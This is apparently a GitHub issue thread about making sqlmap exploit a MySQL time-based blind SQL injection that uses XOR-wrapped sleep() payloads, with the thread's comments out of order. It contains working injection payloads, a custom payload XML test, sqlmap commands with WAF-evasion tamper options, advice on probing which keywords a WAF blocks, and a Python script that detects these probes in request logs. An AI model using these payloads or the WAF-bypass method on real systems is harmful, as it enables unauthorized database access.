Closed adon90 closed 4 years ago
Apparently I have solved my doubt, it works with:
`sqlmap -r sqli.txt --skip-waf --random-agent --level 1 --risk 1 --dbms=mysql --suffix="'" --proxy=http://10.113.90.93:8080 --technique=T --batch`
The thing is that the specific application crashed when trying:
`' XOR(if(12=39,sleep(5),0))OR'` (conditions with numbers; with `if(now()=sysdate(),...)` it doesn't crash).
Regards ;)
If `FROM` is blocked, you'll have a bad time with sqlmap. Hence, I am not sure that you'll accomplish anything with that new payload, other than satisfying your curiosity. Anyway, closing this down as there is nothing further (from my side) to be done here.
I have some problem with some payloads when I add `--suffix="'"`:
```
[13:14:52] [INFO] GET parameter 'strName' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)' injectable
[13:14:52] [INFO] checking if the injection point on GET parameter 'strName' is a false positive
[13:14:52] [WARNING] false positive or unexploitable injection point detected
[13:14:52] [WARNING] GET parameter 'strName' does not seem to be injectable
[13:14:52] [CRITICAL] all tested parameters do not appear to be injectable. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment')

[*] ending @ 13:14:52 /2020-05-06/
```
@maloba1 @stamparm @adon90 I have the same issue. How can I know if `FROM` is blocked or not? If it is not blocked, how can I benefit from that?
@muslimomar it should be pretty simple. Use a random GET parameter (e.g. `foobar`) and try different values inside (e.g. `?foobar=SELECT * FROM information_schema.tables WHERE id>1`). By spotting differences in responses between different values you'll be able to recognize what the WAF blocks and what it doesn't (note: the WAF doesn't know what goes into the database and what doesn't, thus you can do this kind of "testing" anywhere in the request).
@adon90 Thank you for your research.
I've been struggling with such payloads (from Acunetix WVS) and sqlmap for a while, but thanks to you I've finally got it working.
To anyone who's interested in how to make sqlmap work with the `'XOR(if(now()=sysdate(),sleep(10),0))OR'` or `'XOR(if(now()=sysdate(),sleep(10),0))XOR'` payloads:
```xml
<test>
    <title>MySQL >= 5.0.12 SINGLE QUOTES XOR time-based blind (query SLEEP)</title>
    <stype>5</stype>
    <level>1</level>
    <risk>1</risk>
    <clause>1,2,3,8,9</clause>
    <where>1</where>
    <vector>%27XOR(IF([INFERENCE],SLEEP([SLEEPTIME]),0))XOR%27Z</vector>
    <request>
        <payload>%27XOR(IF(NOW()=SYSDATE(),SLEEP([SLEEPTIME]),0))XOR%27Z</payload>
    </request>
    <response>
        <time>[SLEEPTIME]</time>
    </response>
    <details>
        <dbms>MySQL</dbms>
        <dbms_version>>= 5.0.12</dbms_version>
    </details>
</test>
```
```shell
sqlmap -u "https://test.site.com/path?id=0" -p "id" --method=GET --random-agent --risk=3 --level=5 --dbms=mysql --technique=T --tamper=between,space2comment --time-sec=5
```
`--dbms=mysql --technique=T --tamper=between,space2comment` is the most important part; you are free to play with the rest of the params.
`https://test.site.com/path?id=0%27XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR%27Z` should take 0+ secs to complete.
`https://test.site.com/path?id=0%27XOR(if(now()=sysdate()%2Csleep(10)%2C0))XOR%27Z` should take 10+ secs to complete.
Dear @stamparm, hello! Thank you for answering, and for the help.
Can you please add such types of payloads to the T technique? Or maybe add a C technique, which would use a `custom_injections.xml` where the user can test his own payloads.
I also encountered the same problem. Tests performed:
```
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 15.439
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 16.556
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.396
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.503
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.465
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.307
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.645
```
Manually it is confirmed too.
https://github.com/sqlmapproject/sqlmap/issues/5034 (same thing), https://github.com/sqlmapproject/sqlmap/issues/4910 (same), https://github.com/sqlmapproject/sqlmap/issues/4433, https://github.com/sqlmapproject/sqlmap/issues/3456 etc. And there you recommended manually changing the payloads XML file. I tried, but it seems not correct for these types of payloads.
Suffix and prefix will not work here; you also need to manually put `0` as data in the parameter to make it work.
In the comment above, Andrew made one, but he manually posts `0` as data, which can interfere with other payloads, maybe, not sure. If it can be automated, cool.
Thanks a lot.
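For the defending side of the same payloads, here is an added example (not from this thread or from the sqlmap project) in Python: a small triage helper that decodes the query string of logged requests, recognises the XOR-wrapped `sleep()` probes quoted above, and uses the observed response time (the kind of measurements listed above) to separate probes the database actually executed from ones that were blocked or landed on a non-injectable parameter. The log entries and timings are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Matches the XOR-wrapped time-based probes from the thread once URL-decoded, e.g.
#   'XOR(if(now()=sysdate(),sleep(10),0))OR'   or   0'XOR(if(...,sleep(15),0))XOR'Z
# Group 1 is the delay the probe asked the database for, in seconds.
XOR_SLEEP_RE = re.compile(
    r"'\s*XOR\s*\(\s*IF\s*\(.*?SLEEP\s*\(\s*(\d+)\s*\).*?\)\s*\)\s*(?:OR|XOR)\s*'",
    re.IGNORECASE,
)

# Constructed access-log entries: (request path+query, server response time in seconds).
SAMPLE_REQUESTS = [
    ("/path?id=0%27XOR(if(now()%3Dsysdate()%2Csleep(15)%2C0))XOR%27Z", 15.439),
    ("/path?id=0%27XOR(if(now()%3Dsysdate()%2Csleep(0)%2C0))XOR%27Z", 0.396),
    ("/path?id=0%27XOR(if(now()%3Dsysdate()%2Csleep(6)%2C0))XOR%27Z", 7.465),
    ("/path?id=0%27XOR(if(now()%3Dsysdate()%2Csleep(10)%2C0))OR%27", 0.512),  # no delay seen
    ("/path?id=42", 0.210),                                                    # benign
]


def find_probe(url):
    """Return (parameter, requested_sleep_seconds) for the first parameter carrying a probe."""
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        m = XOR_SLEEP_RE.search(value)  # parse_qsl already percent-decodes the value
        if m:
            return name, int(m.group(1))
    return None


def classify(url, response_time):
    """'benign': no probe; 'attempted': probe present but the response beat the requested
    delay (WAF block, query error or non-injectable parameter); 'confirmed': the response
    took at least the requested delay, i.e. SLEEP() ran inside the database and the
    parameter is live. sleep(0) probes are baseline measurements and count as 'attempted'."""
    probe = find_probe(url)
    if probe is None:
        return {"verdict": "benign", "param": None, "requested": 0, "observed": response_time}
    param, requested = probe
    verdict = "confirmed" if requested > 0 and response_time >= requested else "attempted"
    return {"verdict": verdict, "param": param, "requested": requested, "observed": response_time}


def triage(requests):
    """Classify a batch and count verdicts so a responder sees whether any probe succeeded."""
    results = [classify(url, seconds) for url, seconds in requests]
    summary = {"benign": 0, "attempted": 0, "confirmed": 0}
    for r in results:
        summary[r["verdict"]] += 1
    return results, summary
```

Any `confirmed` hit means the parameter needs parameterised queries, not just a WAF rule; the `attempted` ones show which probes the WAF or the application already stopped.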
Hello, I have happened to find a vulnerable parameter with this payload: `'XOR(if(now()=sysdate(),sleep(10),0))OR'`
I haven't been able to automate this with sqlmap, because it seems that payload is not included in `/usr/share/sqlmap/data/xml/payloads/time-based.xml`.
How can I automate that?
In the payloads I have not seen any starting or ending with `'`; it seems sqlmap does that by default. I have thought about adding `--suffix="'"` since it needs it to be exploitable.
This is my suggestion: to include this payload in the `/usr/share/sqlmap/data/xml/payloads/time-based.xml` file.
Is it right?
The WAF doesn't allow using the word `FROM`. Regards, adon90